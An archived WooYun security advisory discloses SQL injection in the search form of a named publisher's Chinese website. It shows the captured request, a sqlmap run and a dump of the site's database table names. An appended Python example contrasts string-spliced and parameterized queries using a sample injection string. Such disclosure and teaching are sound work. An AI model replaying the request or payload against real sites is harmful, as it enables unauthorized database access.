
Vulnerability summary (24 followers)

Defect ID: wooyun-2014-056588

Title: SQL injection vulnerability in Emerald China

Vendor: Emerald China

Author: bitcoin

Submitted: 2014-04-13 18:01

Fix deadline: 2014-05-28 18:01

Published: 2014-05-28 18:01

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: vendor could not be contacted, or the vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help, contact [email protected]

Tags:



Vulnerability details

Disclosure status:

2014-04-13: actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed
2014-05-28: the vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

Emerald China has a SQL injection vulnerability. Emerald is one of the world's leading publishers of management journals and databases.

Detailed description:

Injection page:
www.emeraldinsight.com.cn
In the site's search function, the SeachName parameter is not filtered properly.
Captured request:
POST /Seach.php HTTP/1.1
Host: www.emeraldinsight.com.cn
Proxy-Connection: keep-alive
Content-Length: 25
Cache-Control: max-age=0
Origin: http://www.emeraldinsight.com.cn
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.emeraldinsight.com.cn/Seach.php
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=chjmil3nn73ne22m84ic95r314
SeachName=11&SelType=news
Run sqlmap against it.

[screenshot: 1.jpg]


Some of the tables in the sq_emera database:
| bee_alone |
| bee_article |
| bee_ask |
| bee_auto_fields |
| bee_block |
| bee_book |
| bee_book_info |
| bee_category |
| bee_channel |
| bee_cmsinfo |
| bee_collect |
| bee_down |
| bee_flash_ad |
| bee_flash_info |
| bee_form |
| bee_formfield |
| bee_formlist |
| bee_job |
| bee_keywords |
| bee_lang |
| bee_lang_cate |
| bee_lang_lang |
| bee_link |
| bee_maintb |
| bee_market |
| bee_member |
| bee_member_group |
| bee_prinfo |
| bee_product |
| bee_tpl |
| bee_uppics |
| books |
| call_for |
| category |
| conferences |
| dede_addonarticle |
| dede_addonimages |
| dede_addoninfos |
| dede_addonshop |
| dede_addonsoft |
| dede_addonspec |
| dede_admin |
| dede_admintype |
| dede_advancedsearch |
| dede_arcatt |
| dede_arccache |
| dede_archives |
| dede_arcmulti |
| dede_arcrank |
| dede_arctiny |
| dede_arctype |
| dede_area |
| dede_ask |
| dede_ask_scores |
| dede_askanswer |
| dede_asktype |
| dede_channeltype |
| dede_co_htmls |
| dede_co_mediaurls |
| dede_co_note |
| dede_co_onepage |
| dede_co_urls |
| dede_diyform1 |
| dede_diyforms |
| dede_dl_log |
| dede_downloads |
| dede_erradd |
| dede_feedback |
| dede_flink |
| dede_flinktype |
| dede_freelist |
| dede_group_guestbook |
| dede_group_notice |
| dede_group_posts |
| dede_group_smalltypes |
| dede_group_threads |
| dede_group_user |
| dede_groups |
| dede_guestbook |
| dede_homepageset |
| dede_keywords |
| dede_log |
| dede_mail_order |
| dede_mail_title |
| dede_mail_type |
| dede_member |
| dede_member_company |
| dede_member_feed |
| dede_member_flink |
| dede_member_friends |
| dede_member_group |
| dede_member_guestbook |
| dede_member_model |
| dede_member_msg |
| dede_member_operation |
| dede_member_person |
| dede_member_pms |
| dede_member_snsmsg |
| dede_member_space |
| dede_member_stow |
| dede_member_stowtype |
| dede_member_tj |
| dede_member_type |
| dede_member_vhistory |
| dede_moneycard_record |
| dede_moneycard_type |
| dede_mtypes |
| dede_multiserv_config |
| dede_myad |
| dede_myadtype |
| dede_mytag |
| dede_payment |
| dede_plus |
| dede_purview |
| dede_pwd_tmp |
| dede_ratings |
| dede_scores |
| dede_search_cache |
| dede_search_keywords |
| dede_sgpage |
| dede_shops_delivery |
| dede_shops_orders |
| dede_shops_products |
| dede_shops_userinfo |
| dede_softconfig |
| dede_sphinx |
| dede_stepselect |
| dede_store_groups |
| dede_sys_enum |
| dede_sys_module |
| dede_sys_set |
| dede_sys_task |
| dede_sysconfig |
| dede_tagindex |
| dede_taglist |
| dede_uploads |
| dede_verifies |
| dede_vote |
| dede_vote_member |
| dee_ad |
| dee_cart |
| dee_category |
| dee_category_desc |
| dee_channel_category |
| dee_channel_category_desc |
| dee_channel_content |
| dee_channel_content_desc |
| dee_company |
| dee_company_desc |
| dee_config |
| dee_contact |
| dee_country |
| dee_customer |
| dee_gallery |
| dee_home_meta |
| dee_inquiry |
| dee_inquiry_product |
| dee_keywords |
| dee_language |
| dee_link |
| dee_mail_templates |
| dee_product |
| dee_product_desc |
| dee_product_image |
| dee_sessions |
| dee_statistics |
| dee_tags |
| dee_user |
| espcms_admin_member |
| espcms_admin_powergroup |
| espcms_advert |
| espcms_advert_type |
| espcms_album_file |
| espcms_album_images |
| espcms_bbs |
| espcms_bbs_typelist |
| espcms_calling |
| espcms_city |
| espcms_config |
| espcms_document |
| espcms_document_album |
| espcms_document_attr |
| espcms_document_content |
| espcms_document_label |
| espcms_document_message |
| espcms_enquiry |
| espcms_enquiry_info |
| espcms_filename |
| espcms_form_attr |
| espcms_form_group |
| espcms_form_value |
| espcms_keylink |
| espcms_keylink_type |
| espcms_lng |
| espcms_lngpack |
| espcms_logs |
| espcms_mailinvite_list |
| espcms_mailinvite_type |
| espcms_mailsend |
| espcms_mailsend_log |
| espcms_member |
| espcms_member_attr |
| espcms_member_class |
| espcms_member_value |
| espcms_menubotton |
| espcms_menulink |
| espcms_model |
| espcms_model_att |
| espcms_order |
| espcms_order_info |
| espcms_order_pay |
| espcms_order_payreceipt |
| espcms_order_shipping |
| espcms_order_shipreceipt |
| espcms_skin |
| espcms_subjectlist |
| espcms_templates |
| espcms_typelist |
| huato_ad |
| huato_cart |
| huato_category |
| huato_category_desc |
| huato_channel_category |
| huato_channel_category_desc |
| huato_channel_content |
| huato_channel_content_desc |
| huato_company |
| huato_company_desc |
| huato_config |
| huato_contact |
| huato_country |
| huato_customer |
| huato_gallery |
| huato_home_meta |
| huato_inquiry |
| huato_inquiry_product |
| huato_keywords |
| huato_language |
| huato_link |
| huato_mail_templates |
| huato_product |
| huato_product_brand |
| huato_product_brand_desc |
| huato_product_desc |
| huato_product_image |
| huato_sessions |
| huato_static_url |
| huato_statistics |
| huato_tags |
| huato_user |
| journal_list |
| journals |
| journals_pl |
| messagesa |
| news |
| news_pl |
| nitc_ad |
| nitc_cart |
| nitc_category |
| nitc_category_desc |
| nitc_channel_category |
| nitc_channel_category_desc |
| nitc_channel_content |
| nitc_channel_content_desc |
| nitc_company |
| nitc_company_desc |
| nitc_config |
| nitc_contact |
| nitc_country |
| nitc_customer |
| nitc_gallery |
| nitc_home_meta |
| nitc_inquiry |
| nitc_inquiry_product |
| nitc_keywords |
| nitc_language |
| nitc_link |
| nitc_mail_templates |
| nitc_product |
| nitc_product_brand |
| nitc_product_brand_desc |
| nitc_product_desc |
| nitc_product_image |
| nitc_sessions |
| nitc_static_url |
| nitc_statistics |
| nitc_tags |
| nitc_user |
| subject_area |
| users |
| webpages |
+-----------------------------+

[screenshot: 3.jpg]


[screenshot: 4.jpg]


Proof of vulnerability:

As above.

Fix:

Filter the input. Any gift for this?
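The report says the search handler splices SeachName into its query and that the fix is to filter the input. The durable fix is to bind the parameters rather than filter characters. The following example is added here and is not code from the report or from the Emerald China site: it models the search handler in Python over an in-memory SQLite table (standing in for the site's PHP and MySQL stack) with a constructed news table, borrows the SeachName and SelType parameter names from the captured request, and places the concatenating version beside the parameterized one so the behavioral difference on the same input is visible.

```python
import sqlite3

# Constructed sample rows; the real site's schema is not known beyond the table names dumped above.
SAMPLE_NEWS = [
    (1, "Open access update", "news"),
    (2, "New journal launched", "news"),
    (3, "Internal editorial memo", "internal"),
]


def make_db():
    """Build a throwaway in-memory database with the constructed news table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, type TEXT)")
    conn.executemany("INSERT INTO news VALUES (?, ?, ?)", SAMPLE_NEWS)
    return conn


def search_vulnerable(conn, seach_name, sel_type):
    """Models the defect the report describes: request parameters spliced straight into SQL.

    Because the text becomes part of the statement, a quote in seach_name closes
    the LIKE literal and the rest of the value is parsed as SQL, so the WHERE
    clause (including the type restriction) can be rewritten by the caller.
    """
    sql = ("SELECT id, title FROM news WHERE type = '%s' AND title LIKE '%%%s%%'"
           % (sel_type, seach_name))
    return conn.execute(sql).fetchall()


def search_fixed(conn, seach_name, sel_type):
    """Hardened form: bound parameters, so input can only ever be data, never SQL.

    The LIKE wildcards are added in Python and the whole pattern is passed as one
    bound value; quotes in the input are matched literally against titles.
    """
    sql = "SELECT id, title FROM news WHERE type = ? AND title LIKE ?"
    return conn.execute(sql, (sel_type, "%" + seach_name + "%")).fetchall()


def compare(seach_name, sel_type="news"):
    """Run both handlers on the same input and return their row counts (vulnerable, fixed)."""
    conn = make_db()
    vulnerable_rows = search_vulnerable(conn, seach_name, sel_type)
    fixed_rows = search_fixed(conn, seach_name, sel_type)
    conn.close()
    return len(vulnerable_rows), len(fixed_rows)


if __name__ == "__main__":
    # Ordinary search term: both handlers agree.
    print("journal:", compare("journal"))
    # Input that closes the string literal and appends an always-true clause: the
    # concatenating handler returns every row, including the non-"news" one,
    # while the parameterized handler simply finds no title containing that text.
    print("quote-breaking input:", compare("x%' OR '%'='"))
```

Only the second query is a fix; a character blocklist on SeachName would still leave the query structure under the caller's control and tends to be bypassed by encoding or by characters the list did not anticipate.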

Copyright notice: when reposting, please credit the source: bitcoin@WooYun


Vulnerability response

Vendor response:

The vendor could not be contacted, or the vendor actively refused the report.